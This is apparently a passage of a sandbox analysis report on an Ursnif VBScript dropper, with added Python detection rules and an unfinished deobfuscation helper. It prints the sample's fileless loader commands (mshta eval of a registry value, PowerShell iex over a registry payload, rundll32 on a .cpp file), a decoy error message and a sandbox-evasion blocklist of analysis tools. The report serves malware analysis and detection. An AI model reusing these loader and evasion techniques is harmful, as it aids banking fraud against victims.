Source: Yara match, File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match, File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: Yara match | File sources: the same 21 memory dumps and unpacked PE regions listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01203276 CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError

                      System Summary:

                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code functions: 34_2_01201754, 34_2_01207E30, 34_2_0120725F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code functions (47):
                          39_2_0000019D8B7CE95C, 39_2_0000019D8B7DB948, 39_2_0000019D8B7DB230, 39_2_0000019D8B7D5164, 39_2_0000019D8B7C1164, 39_2_0000019D8B7C4150,
                          39_2_0000019D8B7B0000, 39_2_0000019D8B7B2138, 39_2_0000019D8B7C0124, 39_2_0000019D8B7CA9F8, 39_2_0000019D8B7C7820, 39_2_0000019D8B7B1000,
                          39_2_0000019D8B7B90FC, 39_2_0000019D8B7C70C8, 39_2_0000019D8B7D88B8, 39_2_0000019D8B7CF7B4, 39_2_0000019D8B7E4796, 39_2_0000019D8B7CA790,
                          39_2_0000019D8B7B3610, 39_2_0000019D8B7D2EF8, 39_2_0000019D8B7B76F4, 39_2_0000019D8B7D5ED8, 39_2_0000019D8B7CC6C4, 39_2_0000019D8B7C2EC0,
                          39_2_0000019D8B7D06B4, 39_2_0000019D8B7D6EA0, 39_2_0000019D8B7C6684, 39_2_0000019D8B7C9500, 39_2_0000019D8B7C1DF4, 39_2_0000019D8B7D4DE0,
                          39_2_0000019D8B7C5DBC, 39_2_0000019D8B7C559C, 39_2_0000019D8B7D9408, 39_2_0000019D8B7D3400, 39_2_0000019D8B7B74A4, 39_2_0000019D8B7C4484,
                          39_2_0000019D8B7B4B60, 39_2_0000019D8B7D4354, 39_2_0000019D8B7B1348, 39_2_0000019D8B7C8340, 39_2_0000019D8B7CD328, 39_2_0000019D8B7D730C,
                          39_2_0000019D8B7BABDC, 39_2_0000019D8B7DA3A4, 39_2_0000019D8B7D4BA0, 39_2_0000019D8B7CBA74, 39_2_0000019D8B7B9AD8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_012040DC NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01208055 NtQueryVirtualMemory
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CE95C NtSetContextThread, NtUnmapViewOfSection
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C1950 NtWriteVirtualMemory
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7CE860 NtQueryInformationProcess
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7DA8F0 NtSetInformationProcess, CreateRemoteThread, ResumeThread
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7D20A4 NtQueryInformationToken, NtQueryInformationToken
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C8B90 NtMapViewOfSection
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7C5B80 NtCreateSection
                      Source: 1cv1ijms.dll.41.dr | Static PE information: No import functions for PE file found
                      Source: start[526268].vbs | Initial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
                      Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
                      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (the VBScript engine CLSID, i.e. wscript.exe locating vbscript.dll to run the sample)
                      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210910
                      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
                      Source: classification engine | Classification label: mal100.troj.evad.winVBS@17/16@6/1
                      Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01202102 CreateToolhelp32Snapshot, Process32First, StrStrIA, Process32Next, CloseHandle
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{9E926C87-6559-80BB-DFB2-69B48306AD28}
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: start[526268].vbs | Static file information: File size 1402115 > 1048576
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb | source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP | source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb | source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb | source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP | source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
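The process tree in this section (wscript.exe creating processes through WMI, WmiPrvSE.exe starting rundll32 on a .cpp file in %TEMP%, mshta.exe eval'ing a registry value, PowerShell iex over Get-ItemProperty, csc.exe compiling a source file from %TEMP%) is what the Sigma hits in the overview key on. The following is an added example, not part of the sandbox report: the corresponding process-creation rules run over a handful of constructed Sysmon-style events modelled on this chain plus two benign controls. The field names, the explorer.exe parent of wscript.exe and mshta.exe (the report lists them as unknown) and the shortened command lines are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (the three Sysmon Event ID 1 fields
    the rules below need)."""
    parent_image: str
    image: str
    command_line: str


# Constructed events modelled on the process tree in this report (paths and
# arguments abbreviated; explorer.exe parents are assumed). Last two are benign.
EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\user\Desktop\start[526268].vbs"'),
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe about:<hta:application><script>eval(new ActiveXObject('wscript.shell')"
              r".regread('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\DeviceFile'))</script>"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe iex ([System.Text.Encoding]::ASCII.GetString((gp "
              r"'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"csc.exe /noconfig /fullpaths @C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              r"svchost.exe -k netsvcs"),
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def mshta_spawns_shell(ev: ProcEvent) -> bool:
    return _name(ev.parent_image) == "mshta.exe" and _name(ev.image) in SHELLS


def mshta_evals_registry(ev: ProcEvent) -> bool:
    cl = ev.command_line.lower()
    return _name(ev.image) == "mshta.exe" and "regread(" in cl and "eval(" in cl


def powershell_runs_registry_code(ev: ProcEvent) -> bool:
    """iex/Invoke-Expression over a registry read: code staged in HKCU/HKLM."""
    if _name(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    cl = ev.command_line.lower()
    return (re.search(r"\b(iex|invoke-expression)\b", cl) is not None
            and re.search(r"\b(gp|get-itemproperty|get-itempropertyvalue)\b", cl) is not None
            and re.search(r"\bhk(?:cu|lm)[:\\]", cl) is not None)


def wmiprvse_spawns_rundll32(ev: ProcEvent) -> bool:
    return _name(ev.parent_image) == "wmiprvse.exe" and _name(ev.image) == "rundll32.exe"


def rundll32_non_dll_from_temp(ev: ProcEvent) -> bool:
    """rundll32 loading a module from %TEMP% whose extension is not .dll."""
    if _name(ev.image) != "rundll32.exe":
        return False
    m = re.search(r'rundll32(?:\.exe)?\s+"?([^\s",]+)', ev.command_line, re.I)
    if not m:
        return False
    module = m.group(1).lower()
    return "\\appdata\\local\\temp\\" in module and not module.endswith(".dll")


def csc_source_in_temp(ev: ProcEvent) -> bool:
    return (_name(ev.image) == "csc.exe"
            and re.search(r'@"?[^"\s]*\\appdata\\local\\temp\\', ev.command_line, re.I) is not None)


RULES = [
    ("mshta_spawns_shell", mshta_spawns_shell),
    ("mshta_evals_registry", mshta_evals_registry),
    ("powershell_runs_registry_code", powershell_runs_registry_code),
    ("wmiprvse_spawns_rundll32", wmiprvse_spawns_rundll32),
    ("rundll32_non_dll_from_temp", rundll32_non_dll_from_temp),
    ("csc_source_in_temp", csc_source_in_temp),
]


def evaluate(events) -> dict:
    """Map each rule name to the command lines it fired on."""
    hits: dict = {}
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.setdefault(name, []).append(ev.command_line)
    return hits


if __name__ == "__main__":
    for name, lines in evaluate(EVENTS).items():
        print(f"[{name}]")
        for line in lines:
            print("   ", line)
```

The rules are deliberately narrow (parent/child pairs plus one command-line feature each) so that the benign rundll32 and svchost events do not fire; in production the same logic is normally expressed as Sigma rules over the process_creation logsource rather than as Python.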

                      Data Obfuscation:

                      VBScript performs obfuscated calls to suspicious functions
                      Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface buffer (line breaks restored; truncated in the report):
                          WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)
                          REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni
                          End With
                          EAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")
                          Gnk("DEBUG: F_MESSAGE - True")
                          REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic
                          End Function
                          Function yNzk()
                          Gnk("DEBUG: FS_PROCESS - Start")
                          REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise
                          Gnk("DEBUG: FS_PROCESSCOUNT - Start")
                          on error resume next
                          Dim Theodosian,AFQ
                          Theodosian=6000
                          ' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian
                          AFQ=3000
                          Randomize
                          ' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard
                          WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)
                          yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))
                          wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
                      Note: with Theodosian=6000 and AFQ=3000 the WScript.Sleep call resolves to a random delay of 3000 to 6000 ms (Rnd is in [0,1)); the MsgBox is a decoy "missing MSVCR101.dll" error shown to the user; yDVFproc folds to 0; wSQ is a blocklist of analysis-tool process names (the buffer is cut off at "win in the report), which together with the Select * from Win32_Process query listed under System Summary is consistent with the "Tries to detect sandboxes and other dynamic analysis tools" verdict.
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01207E1F push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01207AB0 push ecx; ret
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7E1000 push eax; retf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 39_2_0000019D8B7BC6E9 push 3B000001h; retf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
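The AMSI buffer under "VBScript performs obfuscated calls to suspicious functions" above shows the three obfuscation devices an analyst has to strip before this loader is readable: filler REM and ' comments, constants folded into parenthesised arithmetic, and a random WScript.Sleep whose bounds sit in variables. As an added example (not part of the report or of the sample), this Python helper does that mechanically on a constructed excerpt modelled on the buffer and pulls out the sleep window and the process blocklist. SAMPLE_VBS and the regular expressions are assumptions about the shape of this particular script, not a general VBScript parser.

```python
import ast
import operator
import re

# Constructed excerpt modelled on the AMSI buffer in the report (not the
# original script): filler comments, a folded constant, a random sleep and a
# short analysis-tool process blocklist.
SAMPLE_VBS = r"""
Function yNzk()
Gnk("DEBUG: FS_PROCESS - Start")
REM emboss indigestion surly rebuttal Kaskaskia upslope lightface
on error resume next
Dim Theodosian,AFQ
Theodosian=6000
' elongate conjoin protactinium monocular warplane riot rubidium
AFQ=3000
Randomize
WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)
yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))
wSQ = Array("frida-winjector-helper-64.exe","ollydbg.exe","procmon.exe","procexp.exe","wireshark.exe")
End Function
"""

_COMMENT_LINE = re.compile(r"^[ \t]*(?:REM\b|').*$", re.MULTILINE)
_CONST_ASSIGN = re.compile(r"^[ \t]*(\w+)[ \t]*=[ \t]*(\d+)[ \t]*$", re.MULTILINE)
_ARITH_ASSIGN = re.compile(r"^([ \t]*\w+[ \t]*=[ \t]*)([\d \t.()+\-*/]+)$", re.MULTILINE)
_SLEEP_CALL = re.compile(r"WScript\.Sleep\s+Int\(\((\w+)-(\w+)\+1\)\*Rnd\+(\w+)\)")
_ARRAY_CALL = re.compile(r"Array\((.*?)\)", re.DOTALL)

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def fold_constants(expr: str) -> float:
    """Evaluate a parenthesised numeric expression without eval(): only
    numeric literals, unary minus and + - * / are accepted."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported syntax: {ast.dump(node)}")
    return walk(ast.parse(expr.strip(), mode="eval"))


def strip_filler_comments(src: str) -> str:
    """Drop whole-line REM / ' comments (the dictionary-word padding)."""
    return _COMMENT_LINE.sub("", src)


def fold_numeric_assignments(src: str) -> str:
    """Rewrite 'x = ((42 + (-27.0)) + ...)' as 'x = <value>'."""
    def repl(m):
        lhs, rhs = m.group(1), m.group(2).strip()
        if not re.search(r"[+\-*/]", rhs):          # plain literal, leave it
            return m.group(0)
        value = fold_constants(rhs)
        return lhs + (str(int(value)) if value == int(value) else repr(value))
    return _ARITH_ASSIGN.sub(repl, src)


def constant_table(src: str) -> dict:
    return {name: int(val) for name, val in _CONST_ASSIGN.findall(src)}


def sleep_window_ms(src: str):
    """Resolve WScript.Sleep Int((hi-lo+1)*Rnd+base). VBScript's Rnd lies in
    [0, 1), so Int() yields base .. base+(hi-lo) inclusive."""
    m = _SLEEP_CALL.search(src)
    if not m:
        return None
    consts = constant_table(src)
    hi, lo, base = (consts[m.group(i)] for i in (1, 2, 3))
    return base, base + (hi - lo)


def process_blocklist(src: str) -> list:
    """Names inside the first Array("...") literal (assumes no ')' in names)."""
    m = _ARRAY_CALL.search(src)
    return re.findall(r'"([^"]*)"', m.group(1)) if m else []


def triage(src: str) -> dict:
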